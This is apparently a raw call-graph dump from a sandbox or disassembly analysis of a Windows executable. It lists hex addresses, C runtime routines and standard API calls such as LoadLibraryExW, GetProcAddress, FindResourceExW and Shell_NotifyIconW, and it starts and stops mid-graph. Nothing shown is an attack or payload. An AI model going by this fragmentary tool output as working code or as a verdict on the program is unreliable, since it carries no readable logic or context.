94988->94993 94992 df4ea 48 API calls 94989->94992 94990 df4ea 48 API calls 94991 c64e4 94990->94991 94991->94907 94992->94993 94993->94990 94995 cbe0d 94994->94995 94999 cbe0a ___crtGetEnvironmentStringsW 94994->94999 94996 df4ea 48 API calls 94995->94996 94997 cbe17 94996->94997 95000 dee75 94997->95000 94999->94987 95002 df4ea __calloc_impl 95000->95002 95001 e395c __crtCompareStringA_stat 47 API calls 95001->95002 95002->95001 95003 df50c 95002->95003 95004 df50e std::exception::exception 95002->95004 95003->94999 95009 e6805 RaiseException 95004->95009 95006 df538 95010 e673b 47 API calls _free 95006->95010 95008 df54a 95008->94999 95009->95006 95010->95008 95076 c4214 95011->95076 95016 134f73 95018 c4252 84 API calls 95016->95018 95017 c41d4 LoadLibraryExW 95086 c4291 95017->95086 95020 134f7a 95018->95020 95022 c4291 3 API calls 95020->95022 95024 134f82 95022->95024 95112 c44ed 95024->95112 95025 c41fb 95025->95024 95026 c4207 95025->95026 95028 c4252 84 API calls 95026->95028 95030 c39fe 95028->95030 95030->94911 95035 10c396 95030->95035 95032 134fa9 95120 c4950 95032->95120 95034 134fb6 95036 c4517 83 API calls 95035->95036 95037 10c405 95036->95037 95301 10c56d 95037->95301 95040 c44ed 64 API calls 95041 10c432 95040->95041 95042 c44ed 64 API calls 95041->95042 95043 10c442 95042->95043 95044 c44ed 64 API calls 95043->95044 95045 10c45d 95044->95045 95046 c44ed 64 API calls 95045->95046 95047 10c478 95046->95047 95048 c4517 83 API calls 95047->95048 95049 10c48f 95048->95049 95050 e395c __crtCompareStringA_stat 47 API calls 95049->95050 95051 10c496 95050->95051 95052 e395c __crtCompareStringA_stat 47 API calls 95051->95052 95053 10c4a0 95052->95053 95054 c44ed 64 API calls 95053->95054 95055 10c4b4 95054->95055 95056 10bf5a GetSystemTimeAsFileTime 95055->95056 95057 10c4c7 95056->95057 95058 10c4f1 95057->95058 95059 10c4dc 95057->95059 95061 10c556 95058->95061 95062 10c4f7 95058->95062 95060 e1c9d _free 47 API calls 95059->95060 95065 10c4e2 95060->95065 95064 e1c9d _free 47 API calls 95061->95064 95307 10b965 95062->95307 95067 10c41b 95064->95067 95068 e1c9d _free 47 API calls 95065->95068 95067->94914 95070 c4252 95067->95070 95068->95067 95069 e1c9d _free 47 API calls 95069->95067 95071 c425c 95070->95071 95072 c4263 95070->95072 95073 e35e4 __fcloseall 83 API calls 95071->95073 95074 c4272 95072->95074 95075 c4283 FreeLibrary 95072->95075 95073->95072 95074->94914 95075->95074 95125 c4339 95076->95125 95080 c41bb 95083 e3499 95080->95083 95081 c4244 FreeLibrary 95081->95080 95082 c423c 95082->95080 95082->95081 95133 e34ae 95083->95133 95085 c41c8 95085->95016 95085->95017 95212 c42e4 95086->95212 95089 c42b8 95091 c41ec 95089->95091 95092 c42c1 FreeLibrary 95089->95092 95093 c4380 95091->95093 95092->95091 95094 df4ea 48 API calls 95093->95094 95095 c4395 95094->95095 95220 c47b7 95095->95220 95097 c43a1 ___crtGetEnvironmentStringsW 95098 c43dc 95097->95098 95099 c4499 95097->95099 95100 c44d1 95097->95100 95101 c4950 57 API calls 95098->95101 95223 c406b CreateStreamOnHGlobal 95099->95223 95234 10c750 93 API calls 95100->95234 95107 c43e5 95101->95107 95104 c44ed 64 API calls 95104->95107 95106 c4479 95106->95025 95107->95104 95107->95106 95108 134ed7 95107->95108 95229 c4517 95107->95229 95109 c4517 83 API calls 95108->95109 95110 134eeb 95109->95110 95111 c44ed 64 API calls 95110->95111 95111->95106 95113 c44ff 95112->95113 95116 134fc0 95112->95116 95258 e381e 95113->95258 95117 10bf5a 95278 10bdb4 95117->95278 95119 10bf70 95119->95032 95121 135002 95120->95121 95122 c495f 95120->95122 95283 e3e65 95122->95283 95124 c4967 95124->95034 95129 c434b 95125->95129 95128 c4321 LoadLibraryA GetProcAddress 95128->95082 95130 c422f 95129->95130 95131 c4354 LoadLibraryA 95129->95131 95130->95082 95130->95128 95131->95130 95132 c4365 GetProcAddress 95131->95132 95132->95130 95136 e34ba __setmbcp 95133->95136 95134 e34cd 95181 e7c0e 47 API calls __getptd_noexit 95134->95181 95136->95134 95138 e34fe 95136->95138 95137 e34d2 95182 e6e10 8 API calls _wprintf 95137->95182 95152 ee4c8 95138->95152 95141 e3503 95142 e350c 95141->95142 95143 e3519 95141->95143 95183 e7c0e 47 API calls __getptd_noexit 95142->95183 95145 e3543 95143->95145 95146 e3523 95143->95146 95166 ee5e0 95145->95166 95184 e7c0e 47 API calls __getptd_noexit 95146->95184 95149 e34dd @_EH4_CallFilterFunc@8 __setmbcp 95149->95085 95153 ee4d4 __setmbcp 95152->95153 95154 e7cf4 __lock 47 API calls 95153->95154 95155 ee4e2 95154->95155 95156 ee559 95155->95156 95162 e7d7c __mtinitlocknum 47 API calls 95155->95162 95164 ee552 95155->95164 95189 e4e5b 48 API calls __lock 95155->95189 95190 e4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95155->95190 95191 e69d0 47 API calls __crtCompareStringA_stat 95156->95191 95159 ee560 95161 ee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95159->95161 95159->95164 95160 ee5cc __setmbcp 95160->95141 95161->95164 95162->95155 95186 ee5d7 95164->95186 95173 ee600 __wopenfile 95166->95173 95167 ee61a 95196 e7c0e 47 API calls __getptd_noexit 95167->95196 95169 ee61f 95197 e6e10 8 API calls _wprintf 95169->95197 95171 e354e 95185 e3570 LeaveCriticalSection LeaveCriticalSection _fseek 95171->95185 95172 ee838 95193 f63c9 95172->95193 95173->95167 95180 ee7d5 95173->95180 95198 e185b 59 API calls 3 library calls 95173->95198 95176 ee7ce 95176->95180 95199 e185b 59 API calls 3 library calls 95176->95199 95178 ee7ed 95178->95180 95200 e185b 59 API calls 3 library calls 95178->95200 95180->95167 95180->95172 95181->95137 95182->95149 95183->95149 95184->95149 95185->95149 95192 e7e58 LeaveCriticalSection 95186->95192 95188 ee5de 95188->95160 95189->95155 95190->95155 95191->95159 95192->95188 95201 f5bb1 95193->95201 95195 f63e2 95195->95171 95196->95169 95197->95171 95198->95176 95199->95178 95200->95180 95204 f5bbd __setmbcp 95201->95204 95202 f5bcf 95203 e7c0e __setmbcp 47 API calls 95202->95203 95205 f5bd4 95203->95205 95204->95202 95206 f5c06 95204->95206 95207 e6e10 _wprintf 8 API calls 95205->95207 95208 f5c78 __wsopen_helper 110 API calls 95206->95208 95211 f5bde __setmbcp 95207->95211 95209 f5c23 95208->95209 95210 f5c4c __wsopen_helper LeaveCriticalSection 95209->95210 95210->95211 95211->95195 95216 c42f6 95212->95216 95215 c42cc LoadLibraryA GetProcAddress 95215->95089 95217 c42aa 95216->95217 95218 c42ff LoadLibraryA 95216->95218 95217->95089 95217->95215 95218->95217 95219 c4310 GetProcAddress 95218->95219 95219->95217 95221 df4ea 48 API calls 95220->95221 95222 c47c9 95221->95222 95222->95097 95224 c4085 FindResourceExW 95223->95224 95225 c40a2 95223->95225 95224->95225 95226 134f16 LoadResource 95224->95226 95225->95098 95226->95225 95227 134f2b SizeofResource 95226->95227 95227->95225 95228 134f3f LockResource 95227->95228 95228->95225 95230 c4526 95229->95230 95233 134fe0 95229->95233 95235 e3a8d 95230->95235 95232 c4534 95232->95107 95234->95098 95236 e3a99 __setmbcp 95235->95236 95237 e3aa7 95236->95237 95239 e3acd 95236->95239 95248 e7c0e 47 API calls __getptd_noexit 95237->95248 95250 e4e1c 95239->95250 95241 e3aac 95249 e6e10 8 API calls _wprintf 95241->95249 95242 e3ad3 95256 e39fe 81 API calls 4 library calls 95242->95256 95245 e3ae2 95257 e3b04 LeaveCriticalSection LeaveCriticalSection _fseek 95245->95257 95247 e3ab7 __setmbcp 95247->95232 95248->95241 95249->95247 95251 e4e4e EnterCriticalSection 95250->95251 95252 e4e2c 95250->95252 95253 e4e44 95251->95253 95252->95251 95254 e4e34 95252->95254 95253->95242 95255 e7cf4 __lock 47 API calls 95254->95255 95255->95253 95256->95245 95257->95247 95261 e3839 95258->95261 95260 c4510 95260->95117 95262 e3845 __setmbcp 95261->95262 95263 e3880 __setmbcp 95262->95263 95264 e385b _memset 95262->95264 95265 e3888 95262->95265 95263->95260 95274 e7c0e 47 API calls __getptd_noexit 95264->95274 95266 e4e1c __lock_file 48 API calls 95265->95266 95268 e388e 95266->95268 95276 e365b 62 API calls 7 library calls 95268->95276 95269 e3875 95275 e6e10 8 API calls _wprintf 95269->95275 95272 e38a4 95277 e38c2 LeaveCriticalSection LeaveCriticalSection _fseek 95272->95277 95274->95269 95275->95263 95276->95272 95277->95263 95281 e344a GetSystemTimeAsFileTime 95278->95281 95280 10bdc3 95280->95119 95282 e3478 __aulldiv 95281->95282 95282->95280 95284 e3e71 __setmbcp 95283->95284 95285 e3e7f 95284->95285 95286 e3e94 95284->95286 95297 e7c0e 47 API calls __getptd_noexit 95285->95297 95288 e4e1c __lock_file 48 API calls 95286->95288 95290 e3e9a 95288->95290 95289 e3e84 95298 e6e10 8 API calls _wprintf 95289->95298 95299 e3b0c 55 API calls 6 library calls 95290->95299 95293 e3ea5 95300 e3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 95293->95300 95295 e3e8f __setmbcp 95295->95124 95296 e3eb7 95296->95295 95297->95289 95298->95295 95299->95293 95300->95296 95306 10c581 __tzset_nolock _wcscmp 95301->95306 95302 c44ed 64 API calls 95302->95306 95303 10c417 95303->95040 95303->95067 95304 10bf5a GetSystemTimeAsFileTime 95304->95306 95305 c4517 83 API calls 95305->95306 95306->95302 95306->95303 95306->95304 95306->95305 95308 10b970 95307->95308 95309 10b97e 95307->95309 95310 e3499 117 API calls 95308->95310 95311 10b9c3 95309->95311 95312 e3499 117 API calls 95309->95312 95337 10b987 95309->95337 95310->95309 95338 10bbe8 64 API calls 3 library calls 95311->95338 95313 10b9a8 95312->95313 95313->95311 95315 10b9b1 95313->95315 95315->95337 95349 e35e4 95315->95349 95316 10ba07 95317 10ba0b 95316->95317 95318 10ba2c 95316->95318 95321 10ba18 95317->95321 95323 e35e4 __fcloseall 83 API calls 95317->95323 95339 10b7e5 47 API calls __crtCompareStringA_stat 95318->95339 95324 e35e4 __fcloseall 83 API calls 95321->95324 95321->95337 95322 10ba34 95325 10ba5a 95322->95325 95326 10ba3a 95322->95326 95323->95321 95324->95337 95340 10ba8a 90 API calls 95325->95340 95328 10ba47 95326->95328 95330 e35e4 __fcloseall 83 API calls 95326->95330 95332 e35e4 __fcloseall 83 API calls 95328->95332 95328->95337 95329 10ba61 95341 10bb64 95329->95341 95330->95328 95332->95337 95334 10ba75 95336 e35e4 __fcloseall 83 API calls 95334->95336 95334->95337 95335 e35e4 __fcloseall 83 API calls 95335->95334 95336->95337 95337->95069 95338->95316 95339->95322 95340->95329 95342 10bb71 95341->95342 95347 10bb77 95341->95347 95343 e1c9d _free 47 API calls 95342->95343 95343->95347 95344 e1c9d _free 47 API calls 95345 10bb88 95344->95345 95346 10ba68 95345->95346 95348 e1c9d _free 47 API calls 95345->95348 95346->95334 95346->95335 95347->95344 95347->95345 95348->95346 95350 e35f0 __setmbcp 95349->95350 95351 e3604 95350->95351 95353 e361c 95350->95353 95378 e7c0e 47 API calls __getptd_noexit 95351->95378 95355 e4e1c __lock_file 48 API calls 95353->95355 95358 e3614 __setmbcp 95353->95358 95354 e3609 95379 e6e10 8 API calls _wprintf 95354->95379 95357 e362e 95355->95357 95362 e3578 95357->95362 95358->95337 95363 e359b 95362->95363 95364 e3587 95362->95364 95367 e3597 95363->95367 95381 e2c84 95363->95381 95421 e7c0e 47 API calls __getptd_noexit 95364->95421 95366 e358c 95422 e6e10 8 API calls _wprintf 95366->95422 95380 e3653 LeaveCriticalSection LeaveCriticalSection _fseek 95367->95380 95374 e35b5 95398 ee9d2 95374->95398 95376 e35bb 95376->95367 95377 e1c9d _free 47 API calls 95376->95377 95377->95367 95378->95354 95379->95358 95380->95358 95382 e2c97 95381->95382 95383 e2cbb 95381->95383 95382->95383 95384 e2933 __stbuf 47 API calls 95382->95384 95387 eeb36 95383->95387 95385 e2cb4 95384->95385 95423 eaf61 95385->95423 95388 e35af 95387->95388 95389 eeb43 95387->95389 95391 e2933 95388->95391 95389->95388 95390 e1c9d _free 47 API calls 95389->95390 95390->95388 95392 e293d 95391->95392 95393 e2952 95391->95393 95448 e7c0e 47 API calls __getptd_noexit 95392->95448 95393->95374 95395 e2942 95449 e6e10 8 API calls _wprintf 95395->95449 95397 e294d 95397->95374 95399 ee9de __setmbcp 95398->95399 95400 ee9e6 95399->95400 95405 ee9fe 95399->95405 95474 e7bda 47 API calls __getptd_noexit 95400->95474 95402 eea7b 95478 e7bda 47 API calls __getptd_noexit 95402->95478 95403 ee9eb 95475 e7c0e 47 API calls __getptd_noexit 95403->95475 95405->95402 95408 eea28 95405->95408 95407 eea80 95479 e7c0e 47 API calls __getptd_noexit 95407->95479 95450 ea8ed 95408->95450 95411 eea2e 95414 eea4c 95411->95414 95415 eea41 95411->95415 95412 eea88 95480 e6e10 8 API calls _wprintf 95412->95480 95476 e7c0e 47 API calls __getptd_noexit 95414->95476 95459 eea9c 95415->95459 95417 ee9f3 __setmbcp 95417->95376 95419 eea47 95477 eea73 LeaveCriticalSection __unlock_fhandle 95419->95477 95421->95366 95422->95367 95424 eaf6d __setmbcp 95423->95424 95425 eaf8d 95424->95425 95426 eaf75 95424->95426 95428 eb022 95425->95428 95432 eafbf 95425->95432 95427 e7bda __set_osfhnd 47 API calls 95426->95427 95429 eaf7a 95427->95429 95430 e7bda __set_osfhnd 47 API calls 95428->95430 95431 e7c0e __setmbcp 47 API calls 95429->95431 95433 eb027 95430->95433 95434 eaf82 __setmbcp 95431->95434 95435 ea8ed ___lock_fhandle 49 API calls 95432->95435 95436 e7c0e __setmbcp 47 API calls 95433->95436 95434->95383 95437 eafc5 95435->95437 95438 eb02f 95436->95438 95439 eafeb 95437->95439 95440 eafd8 95437->95440 95441 e6e10 _wprintf 8 API calls 95438->95441 95443 e7c0e __setmbcp 47 API calls 95439->95443 95442 eb043 __chsize_nolock 75 API calls 95440->95442 95441->95434 95444 eafe4 95442->95444 95445 eaff0 95443->95445 95447 eb01a __flswbuf LeaveCriticalSection 95444->95447 95446 e7bda __set_osfhnd 47 API calls 95445->95446 95446->95444 95447->95434 95448->95395 95449->95397 95452 ea8f9 __setmbcp 95450->95452 95451 ea946 EnterCriticalSection 95454 ea96c __setmbcp 95451->95454 95452->95451 95453 e7cf4 __lock 47 API calls 95452->95453 95455 ea91d 95453->95455 95454->95411 95456 ea93a 95455->95456 95457 ea928 InitializeCriticalSectionAndSpinCount 95455->95457 95458 ea970 ___lock_fhandle LeaveCriticalSection 95456->95458 95457->95456 95458->95451 95460 eaba4 __lseeki64_nolock 47 API calls 95459->95460 95462 eeaaa 95460->95462 95461 eeb00 95463 eab1e __free_osfhnd 48 API calls 95461->95463 95462->95461 95464 eaba4 __lseeki64_nolock 47 API calls 95462->95464 95473 eeade 95462->95473 95466 eeb08 95463->95466 95467 eead5 95464->95467 95465 eaba4 __lseeki64_nolock 47 API calls 95468 eeaea CloseHandle 95465->95468 95469 eeb2a 95466->95469 95470 e7bed __dosmaperr 47 API calls 95466->95470 95471 eaba4 __lseeki64_nolock 47 API calls 95467->95471 95468->95461 95472 eeaf6 GetLastError 95468->95472 95469->95419 95470->95469 95471->95473 95472->95461 95473->95461 95473->95465 95474->95403 95475->95417 95476->95419 95477->95417 95478->95407 95479->95412 95480->95417 95481->94922 95482->94930 95483->94940 95484->94940 95485->94939 95486->94953 95487->94955 95488->94952 95489->94960 95490->94965 95491->94980 95492->94977 95552 ef8a0 95493->95552 95496 c6a63 48 API calls 95497 c6643 95496->95497 95554 c6571 95497->95554 95500 c40a7 95501 ef8a0 __ftell_nolock 95500->95501 95502 c40b4 GetLongPathNameW 95501->95502 95503 c6a63 48 API calls 95502->95503 95504 c40dc 95503->95504 95505 c49a0 95504->95505 95506 cd7f7 48 API calls 95505->95506 95507 c49b2 95506->95507 95508 c660f 49 API calls 95507->95508 95509 c49bd 95508->95509 95510 c49c8 95509->95510 95511 132e35 95509->95511 95513 c64cf 48 API calls 95510->95513 95515 132e4f 95511->95515 95568 dd35e 60 API calls 95511->95568 95514 c49d4 95513->95514 95562 c28a6 95514->95562 95517 c49e7 Mailbox 95517->94716 95519 c41a9 136 API calls 95518->95519 95520 c415e 95519->95520 95521 133489 95520->95521 95523 c41a9 136 API calls 95520->95523 95522 10c396 122 API calls 95521->95522 95524 13349e 95522->95524 95525 c4172 95523->95525 95527 1334a2 95524->95527 95528 1334bf 95524->95528 95525->95521 95526 c417a 95525->95526 95529 1334aa 95526->95529 95530 c4186 95526->95530 95531 c4252 84 API calls 95527->95531 95532 df4ea 48 API calls 95528->95532 95657 106b49 87 API calls _wprintf 95529->95657 95569 cc833 95530->95569 95531->95529 95550 133504 Mailbox 95532->95550 95536 1334b8 95536->95528 95537 1336b4 95538 e1c9d _free 47 API calls 95537->95538 95539 1336bc 95538->95539 95540 c4252 84 API calls 95539->95540 95545 1336c5 95540->95545 95544 e1c9d _free 47 API calls 95544->95545 95545->95544 95546 c4252 84 API calls 95545->95546 95663 1025b5 86 API calls 4 library calls 95545->95663 95546->95545 95548 cce19 48 API calls 95548->95550 95550->95537 95550->95545 95550->95548 95658 102551 48 API calls ___crtGetEnvironmentStringsW 95550->95658 95659 102472 60 API calls 2 library calls 95550->95659 95660 109c12 48 API calls 95550->95660 95661 cba85 48 API calls ___crtGetEnvironmentStringsW 95550->95661 95662 c4dd9 48 API calls 95550->95662 95553 c661c GetFullPathNameW 95552->95553 95553->95496 95555 c657f 95554->95555 95558 cb18b 95555->95558 95557 c4114 95557->95500 95559 cb199 95558->95559 95561 cb1a2 ___crtGetEnvironmentStringsW 95558->95561 95560 cbdfa 48 API calls 95559->95560 95559->95561 95560->95561 95561->95557 95563 c28b8 95562->95563 95567 c28d7 ___crtGetEnvironmentStringsW 95562->95567 95565 df4ea 48 API calls 95563->95565 95564 df4ea 48 API calls 95566 c28ee 95564->95566 95565->95567 95566->95517 95567->95564 95568->95511 95570 cc843 __ftell_nolock 95569->95570 95571 133095 95570->95571 95572 cc860 95570->95572 95688 1025b5 86 API calls 4 library calls 95571->95688 95669 c48ba 49 API calls 95572->95669 95575 1330a8 95689 1025b5 86 API calls 4 library calls 95575->95689 95576 cc882 95670 c4550 56 API calls 95576->95670 95578 cc897 95578->95575 95580 cc89f 95578->95580 95582 cd7f7 48 API calls 95580->95582 95581 1330c4 95585 cc90c 95581->95585 95583 cc8ab 95582->95583 95671 de968 49 API calls __ftell_nolock 95583->95671 95587 1330d7 95585->95587 95588 cc91a 95585->95588 95586 cc8b7 95589 cd7f7 48 API calls 95586->95589 95591 c4907 CloseHandle 95587->95591 95674 e1dfc 95588->95674 95593 cc8c3 95589->95593 95592 1330e3 95591->95592 95594 c41a9 136 API calls 95592->95594 95595 c660f 49 API calls 95593->95595 95596 13310d 95594->95596 95597 cc8d1 95595->95597 95599 133136 95596->95599 95602 10c396 122 API calls 95596->95602 95672 deb66 SetFilePointerEx ReadFile 95597->95672 95598 cc943 _wcscat _wcscpy 95601 cc96d SetCurrentDirectoryW 95598->95601 95690 1025b5 86 API calls 4 library calls 95599->95690 95605 df4ea 48 API calls 95601->95605 95606 133129 95602->95606 95603 cc8fd 95673 c46ce SetFilePointerEx SetFilePointerEx 95603->95673 95609 cc988 95605->95609 95610 133152 95606->95610 95611 133131 95606->95611 95608 13314d 95616 ccad1 Mailbox 95608->95616 95612 c47b7 48 API calls 95609->95612 95614 c4252 84 API calls 95610->95614 95613 c4252 84 API calls 95611->95613 95629 cc993 Mailbox __NMSG_WRITE 95612->95629 95613->95599 95615 133157 95614->95615 95617 df4ea 48 API calls 95615->95617 95664 c48dd 95616->95664 95624 133194 95617->95624 95618 cca9d 95684 c4907 95618->95684 95622 ccaa9 SetCurrentDirectoryW 95622->95616 95623 c3d98 95623->94585 95623->94607 95691 cba85 48 API calls ___crtGetEnvironmentStringsW 95624->95691 95628 1333ce 95697 109b72 48 API calls 95628->95697 95629->95618 95638 13345f 95629->95638 95640 cce19 48 API calls 95629->95640 95643 133467 95629->95643 95677 cb337 56 API calls _wcscpy 95629->95677 95678 dc258 GetStringTypeW 95629->95678 95679 ccb93 59 API calls __wcsnicmp 95629->95679 95680 ccb5a GetStringTypeW __NMSG_WRITE 95629->95680 95681 e16d0 GetStringTypeW __wtof_l 95629->95681 95682 ccc24 162 API calls 3 library calls 95629->95682 95683 dc682 48 API calls 95629->95683 95632 133480 95632->95618 95634 1333f0 95698 1229e8 48 API calls ___crtGetEnvironmentStringsW 95634->95698 95636 1333fd 95639 e1c9d _free 47 API calls 95636->95639 95700 10240b 48 API calls 3 library calls 95638->95700 95639->95616 95640->95629 95701 1025b5 86 API calls 4 library calls 95643->95701 95648 cce19 48 API calls 95653 1331dd Mailbox 95648->95653 95651 133420 95699 1025b5 86 API calls 4 library calls 95651->95699 95653->95628 95653->95648 95653->95651 95692 102551 48 API calls ___crtGetEnvironmentStringsW 95653->95692 95693 102472 60 API calls 2 library calls 95653->95693 95694 109c12 48 API calls 95653->95694 95695 cba85 48 API calls ___crtGetEnvironmentStringsW 95653->95695 95696 dc682 48 API calls 95653->95696 95654 133439 95655 e1c9d _free 47 API calls 95654->95655 95656 13344c 95655->95656 95656->95616 95657->95536 95658->95550 95659->95550 95660->95550 95661->95550 95662->95550 95663->95545 95665 c4907 CloseHandle 95664->95665 95666 c48e5 Mailbox 95665->95666 95667 c4907 CloseHandle 95666->95667 95668 c48fc 95667->95668 95668->95623 95669->95576 95670->95578 95671->95586 95672->95603 95673->95585 95702 e1e46 95674->95702 95677->95629 95678->95629 95679->95629 95680->95629 95681->95629 95682->95629 95683->95629 95685 c4920 95684->95685 95686 c4911 95684->95686 95685->95686 95687 c4925 CloseHandle 95685->95687 95686->95622 95687->95686 95688->95575 95689->95581 95690->95608 95691->95653 95692->95653 95693->95653 95694->95653 95695->95653 95696->95653 95697->95634 95698->95636 95699->95654 95700->95643 95701->95632 95703 e1e61 95702->95703 95706 e1e55 95702->95706 95726 e7c0e 47 API calls __getptd_noexit 95703->95726 95705 e2019 95711 e1e41 95705->95711 95727 e6e10 8 API calls _wprintf 95705->95727 95706->95703 95713 e1ed4 95706->95713 95721 e9d6b 47 API calls 2 library calls 95706->95721 95709 e1fa0 95709->95703 95709->95711 95714 e1fb0 95709->95714 95710 e1f5f 95710->95703 95712 e1f7b 95710->95712 95723 e9d6b 47 API calls 2 library calls 95710->95723 95711->95598 95712->95703 95712->95711 95717 e1f91 95712->95717 95713->95703 95720 e1f41 95713->95720 95722 e9d6b 47 API calls 2 library calls 95713->95722 95725 e9d6b 47 API calls 2 library calls 95714->95725 95724 e9d6b 47 API calls 2 library calls 95717->95724 95720->95709 95720->95710 95721->95713 95722->95720 95723->95712 95724->95711 95725->95711 95726->95705 95727->95711 95729 df4ea 48 API calls 95728->95729 95730 c6b54 95729->95730 95730->94728 95731->94722 95733 c4c8b 95732->95733 95738 c4d94 95732->95738 95734 df4ea 48 API calls 95733->95734 95733->95738 95735 c4cb2 95734->95735 95736 df4ea 48 API calls 95735->95736 95742 c4d22 95736->95742 95738->94733 95742->95738 95745 cb470 95742->95745 95773 c4dd9 48 API calls 95742->95773 95774 109af1 48 API calls 95742->95774 95775 cba85 48 API calls ___crtGetEnvironmentStringsW 95742->95775 95743->94735 95744->94737 95776 c6b0f 95745->95776 95747 cb69b 95788 cba85 48 API calls ___crtGetEnvironmentStringsW 95747->95788 95749 cb6b5 Mailbox 95749->95742 95752 13397b 95792 1026bc 88 API calls 4 library calls 95752->95792 95754 cb9e4 95794 1026bc 88 API calls 4 library calls 95754->95794 95756 133973 95756->95749 95759 cba85 48 API calls 95765 cb495 95759->95765 95760 133989 95793 cba85 48 API calls ___crtGetEnvironmentStringsW 95760->95793 95761 cbcce 48 API calls 95761->95765 95763 133909 95764 c6b4a 48 API calls 95763->95764 95767 133914 95764->95767 95765->95747 95765->95752 95765->95754 95765->95759 95765->95761 95765->95763 95769 cbdfa 48 API calls 95765->95769 95772 133939 ___crtGetEnvironmentStringsW 95765->95772 95781 cc413 59 API calls 95765->95781 95782 cbb85 95765->95782 95787 cbc74 48 API calls 95765->95787 95789 cc6a5 49 API calls 95765->95789 95790 cc799 48 API calls ___crtGetEnvironmentStringsW 95765->95790 95771 df4ea 48 API calls 95767->95771 95770 cb66c CharUpperBuffW 95769->95770 95770->95765 95771->95772 95791 1026bc 88 API calls 4 library calls 95772->95791 95773->95742 95774->95742 95775->95742 95777 df4ea 48 API calls 95776->95777 95778 c6b34 95777->95778 95779 c6b4a 48 API calls 95778->95779 95780 c6b43 95779->95780 95780->95765 95781->95765 95783 cbb9b 95782->95783 95786 cbb96 ___crtGetEnvironmentStringsW 95782->95786 95784 131b77 95783->95784 95785 dee75 48 API calls 95783->95785 95785->95786 95786->95765 95787->95765 95788->95749 95789->95765 95790->95765 95791->95756 95792->95760 95793->95756 95794->95756 95796 c403c LoadImageW 95795->95796 95797 13418d EnumResourceNamesW 95795->95797 95798 c3ee1 RegisterClassExW 95796->95798 95797->95798 95799 c3f53 7 API calls 95798->95799 95799->94752 95801 133c33 95800->95801 95802 c4c44 95800->95802 95801->95802 95803 133c3c DestroyIcon 95801->95803 95802->94758 95826 105819 61 API calls _W_store_winword 95802->95826 95803->95802 95805 c51cb 95804->95805 95825 c52a2 Mailbox 95804->95825 95806 c6b0f 48 API calls 95805->95806 95807 c51d9 95806->95807 95808 133ca1 LoadStringW 95807->95808 95809 c51e6 95807->95809 95812 133cbb 95808->95812 95810 c6a63 48 API calls 95809->95810 95811 c51fb 95810->95811 95811->95812 95813 c520c 95811->95813 95814 c510d 48 API calls 95812->95814 95815 c5216 95813->95815 95816 c52a7 95813->95816 95819 133cc5 95814->95819 95818 c510d 48 API calls 95815->95818 95817 c6eed 48 API calls 95816->95817 95822 c5220 _memset _wcscpy 95817->95822 95818->95822 95820 c518c 48 API calls 95819->95820 95819->95822 95821 133ce7 95820->95821 95823 c518c 48 API calls 95821->95823 95824 c5288 Shell_NotifyIconW 95822->95824 95823->95822 95824->95825 95825->94763 95826->94758 95828 cef1d 95827->95828 95829 cef2f 95827->95829 96039 ce3b0 335 API calls 2 library calls 95828->96039 96040 10cc5c 86 API calls 4 library calls 95829->96040 95831 cef26 95831->94823 95833 1386f9 95833->95833 95835 cf130 95834->95835 95838 cfe30 335 API calls 95835->95838 95842 cf199 95835->95842 95836 cf3dd 95839 1387c8 95836->95839 95848 cf3f2 95836->95848 95884 cf431 Mailbox 95836->95884 95837 cf595 95844 cd7f7 48 API calls 95837->95844 95837->95884 95840 138728 95838->95840 96045 10cc5c 86 API calls 4 library calls 95839->96045 95840->95842 96042 10cc5c 86 API calls 4 library calls 95840->96042 95842->95836 95842->95837 95845 cd7f7 48 API calls 95842->95845 95878 cf229 95842->95878 95846 1387a3 95844->95846 95850 138772 95845->95850 96044 e0f0a 52 API calls __cinit 95846->96044 95876 cf418 95848->95876 96046 109af1 48 API calls 95848->96046 95849 138b1b 95864 138bcf 95849->95864 95865 138b2c 95849->95865 96043 e0f0a 52 API calls __cinit 95850->96043 95852 cf770 95856 138a45 95852->95856 95875 cf77a 95852->95875 95854 cd6e9 55 API calls 95854->95884 95855 138c53 96060 10cc5c 86 API calls 4 library calls 95855->96060 96052 dc1af 48 API calls 95856->96052 95857 138810 96047 11eef8 335 API calls 95857->96047 95858 cfe30 335 API calls 95879 cf6aa 95858->95879 95859 10cc5c 86 API calls 95859->95884 95860 138b7e 96055 11e40a 335 API calls Mailbox 95860->96055 96057 10cc5c 86 API calls 4 library calls 95864->96057 96054 11f5ee 335 API calls 95865->96054 95866 138beb 96058 11bdbd 335 API calls Mailbox 95866->96058 95868 cfe30 335 API calls 95868->95884 95870 d1b90 48 API calls 95870->95884 95872 d1b90 48 API calls 95872->95884 95875->95870 95876->95849 95876->95879 95876->95884 95877 138c00 95898 cf537 Mailbox 95877->95898 96059 10cc5c 86 API calls 4 library calls 95877->96059 95878->95836 95878->95837 95878->95876 95878->95884 95879->95852 95879->95858 95881 cfce0 95879->95881 95879->95884 95879->95898 95880 138823 95880->95876 95883 13884b 95880->95883 95881->95898 96056 10cc5c 86 API calls 4 library calls 95881->96056 96048 11ccdc 48 API calls 95883->96048 95884->95854 95884->95855 95884->95859 95884->95860 95884->95866 95884->95868 95884->95872 95884->95881 95884->95898 96041 cdd47 48 API calls ___crtGetEnvironmentStringsW 95884->96041 96053 f97ed InterlockedDecrement 95884->96053 96061 dc1af 48 API calls 95884->96061 95888 138857 95890 138865 95888->95890 95891 1388aa 95888->95891 96049 109b72 48 API calls 95890->96049 95894 1388a0 Mailbox 95891->95894 96050 10a69d 48 API calls 95891->96050 95892 cfe30 335 API calls 95892->95898 95894->95892 95896 1388e7 96051 cbc74 48 API calls 95896->96051 95898->94823 95900 d479f 95899->95900 95901 d4637 95899->95901 95904 cce19 48 API calls 95900->95904 95902 136e05 95901->95902 95903 d4643 95901->95903 96116 11e822 95902->96116 96115 d4300 335 API calls ___crtGetEnvironmentStringsW 95903->96115 95911 d46e4 Mailbox 95904->95911 95907 136e11 95908 d4739 Mailbox 95907->95908 96156 10cc5c 86 API calls 4 library calls 95907->96156 95908->94823 95910 d4659 95910->95907 95910->95908 95910->95911 95915 c4252 84 API calls 95911->95915 96062 106524 95911->96062 96065 10fa0c 95911->96065 96106 116ff0 95911->96106 95915->95908 95917 de253 95916->95917 95919 13df42 95916->95919 95917->94823 95918 13df77 95919->95918 95920 13df59 TranslateAcceleratorW 95919->95920 95920->95917 95922 ddca3 95921->95922 95923 ddc71 95921->95923 95922->94823 95923->95922 95924 ddc96 